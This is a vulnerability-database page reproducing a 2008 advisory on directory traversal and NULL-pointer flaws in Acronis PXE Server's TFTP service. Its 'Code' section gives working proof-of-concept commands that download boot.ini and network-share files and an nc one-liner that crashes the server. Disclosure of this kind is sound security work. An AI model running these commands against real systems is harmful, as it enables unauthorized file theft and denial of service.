Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Acronis PXE Server 2.0.0.1076 Directory Traversal / NULL Pointer Vulns

🗓️ 10 Mar 2008 00:00:00Reported by Luigi AuriemmaType 
zdt
 zdt🔗 0day.today👁 9 Views

Acronis PXE Server 2.0.0.1076 Directory Traversal and NULL Pointer Vulnerabilitie

Code
======================================================================
Acronis PXE Server 2.0.0.1076 Directory Traversal / NULL Pointer Vulns
======================================================================

#######################################################################

                             Luigi Auriemma

Application:  Acronis PXE Server
              http://www.acronis.com/enterprise/products/snapdeploy/
Versions:     <= 2.0.0.1076
Platforms:    Windows
Bugs:         A] directory traversal
              B] NULL pointer
Exploitation: remote
Date:         08 Mar 2008
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Acronis PXE Server is an essential component of Acronis Snap Deploy
Server, a deployment solution for automatically configuring all the
clients of the local network.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

The PXE Server (pxesrv.exe) implements a TFTP server for allowing the
downloading of the bootstrap files (uploading is not allowed).
This service is vulnerable to a classical directory traversal and an
arbitrary path attacks which allow an attacker to download any file
from the local disks or the network shares.


---------------
B] NULL pointer
---------------

An incomplete TFTP request (anything which goes from the simple absence
of the option field to the usage of only the 2 bytes for the opcode)
causes the crashing of the PXE Server due to a NULL pointer access.


#######################################################################

===========
3) The Code
===========


A]
http://aluigi.org/testz/tftpx.zip

  tftpx SERVER ..\../..\../boot.ini none
  tftpx SERVER c:\boot.ini none
  tftpx SERVER \\internal_host\documents\file.txt none

B]
send the bytes 00 01 to UDP port 69 of the server:

  echo -n -e \x00\x01|nc SERVER 69 -v -v -u



#######################################################################

======
4) Fix
======


No fix


#######################################################################



#  0day.today [2018-03-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2008 00:00Current
7.1High risk
Vulners AI Score7.1
acronis pxe serverwindows platformdirectory traversalnull pointerremote exploitationluigi auriemmatftp serverbootstrap fileslocal disksnetwork sharesudp port 69
9